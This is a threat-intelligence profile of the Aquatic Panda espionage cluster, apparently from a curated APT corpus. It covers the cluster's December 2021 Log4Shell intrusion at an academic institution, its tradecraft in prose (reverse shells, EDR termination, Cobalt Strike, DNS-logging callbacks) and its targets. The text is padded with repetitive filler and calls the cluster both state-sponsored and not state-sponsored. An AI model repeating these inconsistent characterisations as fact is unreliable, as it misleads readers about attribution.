Aquatic Panda is a People's Republic of China state-sponsored cyber-espionage cluster active publicly since May 2020, tracked under the canonical CrowdStrike naming following CrowdStrike's China-Panda nomenclature convention. The cluster is one of the more recently-publicly-tracked China- attributed APT clusters in modern cyber-threat-intelligence reporting and is operationally distinctive for two operational-pattern features: (1) the cluster's dual-mission operational pattern (intelligence collection PLUS industrial espionage) operationally distinguishes Aquatic Panda from competing China-attributed clusters that focus on intelligence-collection-only operational missions.
(2) the cluster has the strongest publicly-documented Log4Shell exploitation tradecraft among publicly-attributed China- tracked APT clusters, established through the canonical CrowdStrike Falcon OverWatch December 2021 disclosure of the cluster's exploitation of Log4Shell against an academic institution. Operationally Aquatic Panda's signature December 2021 Log4Shell academic-institution campaign brought the cluster to high operational visibility in modern cyber-threat- intelligence reporting. The CrowdStrike OverWatch disclosure documented the cluster's exploitation of the Apache Log4j Log4Shell vulnerability (CVE-2021-44228) against a vulnerable VMware Horizon Tomcat web server instance using the Log4j library at an unnamed "large academic institution." The operationally-distinctive exploitation chain included: (a) use of a modified version of the Log4Shell exploit (published on GitHub on December 13, 2021) targeted at the VMware Horizon instance.
(b) multiple connectivity-check DNS lookups for a subdomain under the publicly-accessible DNS-logging service dns[.]1433[.]eu[.]org from the compromised host, operationally using a public DNS-logging service to identify when the Log4Shell exploit had achieved successful code execution before deploying follow-on tooling.
(c) execution of a series of Linux commands including attempted bash-based interactive shell establishment with a hardcoded IP address plus curl and wget commands to retrieve threat-actor tooling hosted on remote infrastructure.
(d) signature attempted termination of a third-party endpoint detection and response (EDR) service operating on the compromised host, operationally consistent across the cluster's observed tradecraft.
(e) download and execution of a Base64-encoded PowerShell command to retrieve malware and three VBS-extension files from remote infrastructure, the VBS files were loaded into memory as reverse-shell payloads providing operator interactive access. CrowdStrike Intelligence linked the operation infrastructure to the Aquatic Panda cluster and operationally disrupted the intrusion before the cluster could achieve full intelligence-collection objectives. The December 2021 Log4Shell academic-institution campaign was operationally significant beyond the specific operation because it represented one of the earliest publicly-documented APT-tier Log4Shell exploitation operations across the broader Log4Shell exploitation landscape and operationally established that the broader Log4Shell vulnerability was being actively exploited not only by financially-motivated organized cybercrime (Conti was the first publicly-documented ransomware operation to adopt Log4Shell weaponization on December 20, 2021) but also by state-aligned APT clusters in support of intelligence-collection objectives. The CrowdStrike OverWatch real-time operational-detection-and- response pattern that produced the December 2021 disclosure operationally demonstrated the analytical-value of detailed threat-actor-tradecraft documentation during active intrusion operations. Signature operational tradecraft includes: (1) N-DAY VULNERABILITY EXPLOITATION OF INTERNET-FACING SERVICES. The cluster's signature initial-access vector is rapid N-day exploitation of newly-disclosed vulnerabilities in internet-facing applications and services. The December 2021 Log4Shell exploitation (within approximately one week of CVE-2021-44228 public disclosure on December 10, 2021) operationally demonstrates the cluster's rapid-N-day- acquisition-and-weaponization capability. The reliance on N-day rather than zero-day exploitation is operationally consistent with the cluster's positioning as state-aligned- but-not-state-sponsored-with-elite-0day-access, consistent with the broader Chinese state-aligned APT ecosystem in which only a subset of clusters (e.g., APT41 / Wicked Panda, Volt Typhoon, Silk Typhoon under certain naming) maintain zero-day-acquisition capability. (2) PUBLIC DNS-LOGGING-SERVICE ABUSE FOR EXPLOIT-SUCCESS DETECTION. The cluster operationally abuses publicly- accessible DNS-logging services (dns[.]1433[.]eu[.]org in the December 2021 campaign) to identify when remote-code- execution exploits have achieved successful code execution on victim hosts. The technique operationally exploits the legitimate-service traffic profile of public DNS-logging services to evade network-detection signatures focused on attacker-controlled-infrastructure DNS queries. The DNS- logging-service-abuse tradecraft is also observed across multiple other threat-actor clusters (industry analysis notes the technique is used opportunistically by multiple actors rather than being Aquatic-Panda-exclusive) but the operational pattern is signature in the December 2021 academic-institution campaign documentation. (3) ATTEMPTED EDR TERMINATION POST-COMPROMISE. The cluster operationally attempts termination of third-party endpoint detection and response (EDR) services operating on compromised hosts as a signature defense-evasion tradecraft. The pattern is operationally consistent with broader China- attributed APT cluster anti-EDR tradecraft observed across multiple clusters including APT41 / Wicked Panda and others. (4) MULTI-STAGE PAYLOAD DELIVERY VIA PUBLIC-INFRASTRUCTURE- HOSTED TOOLING. The cluster operationally retrieves tooling from remote infrastructure via curl, wget, or PowerShell commands following initial compromise, operationally separating the initial-access exploitation payload from the operational tooling payload to enable rapid tooling updates without requiring exploitation-payload re-deployment. (5) IN-MEMORY VBS REVERSE-SHELL DEPLOYMENT. The cluster's December 2021 campaign documented use of three VBS-extension files loaded into memory as reverse-shell payloads, operationally consistent with the cluster's preference for in-memory execution tradecraft for evasion of file-based endpoint-detection-and-response signatures. (6) COBALT STRIKE BEACON AS PRIMARY POST-COMPROMISE FRAMEWORK. Industry analysis and CrowdStrike Intelligence tracking consistently observe Cobalt Strike Beacon as the cluster's primary post-compromise command-and-control framework, operationally consistent with broader China-attributed APT cluster tooling patterns and with the broader cyber-threat- intelligence ecosystem observation that Cobalt Strike Beacon is among the most-commonly-used post-compromise frameworks across both organized cybercrime and state-aligned operations. (7) DUAL-MISSION OPERATIONAL TARGETING PROFILE. The cluster's dual-mission operational pattern of (a) intelligence collection across telecommunications/technology/government sectors AND (b) industrial-espionage targeting of technology-sector organizations is operationally distinguishable from competing China-attributed clusters with intelligence-collection-only operational focus. Industrial-espionage operational objectives include intellectual property exfiltration, research-and- development data collection, and competitive-intelligence collection supporting Chinese-state-aligned technology-sector industrial-policy priorities. The dual-mission operational pattern operationally aligns with broader Chinese-state- aligned operational priorities in which technology-sector industrial espionage and intelligence-collection operations are operationally coordinated under the same state-aligned operational umbrella. Targeted sectors across the cluster's operational history include telecommunications (signature primary targeting sector), technology and IT services, government administration, defense and military, academic and research institutions, higher education universities, aerospace, critical infrastructure, semiconductor and chip design, software development, cloud service providers, and virtualization platform vendors (consistent with the December 2021 VMware Horizon exploitation targeting). Targeted geographies include the United States (signature primary geography, including the December 2021 academic-institution campaign target), United Kingdom, Canada, Australia, New Zealand (Five-Eyes- aligned), Germany, France, Japan, South Korea, Taiwan, and broader Western and Five-Eyes-aligned economies. The cluster is operationally significant as one of the China-attributed APT clusters with the strongest publicly- documented Log4Shell exploitation tradecraft and the dual- mission operational pattern that operationally distinguishes Aquatic Panda from competing China-attributed clusters in the broader Chinese state-aligned APT ecosystem. The cluster fills the modern China-attributed cluster cell with signature Log4Shell exploitation tradecraft documentation in this curated corpus, complementing the broader China-attributed APT coverage across approximately 30+ clusters in the corpus (apt1, apt3, apt10, apt17, apt31, apt40, apt41, aoqin_dragon, blacktech, cloud_atlas, daggerfly, dark_pink, earth_lusca, emissary_panda, flax_typhoon, gallium, goblin_panda_1937cn, icefog, ke3chang, mirrorface, mustang_panda, naikon, redfoxtrot, redhotel, salt_typhoon, sea_turtle, silk_typhoon, tick_bronze_butler, toddycat, tonto_team, tropic_trooper, volt_typhoon).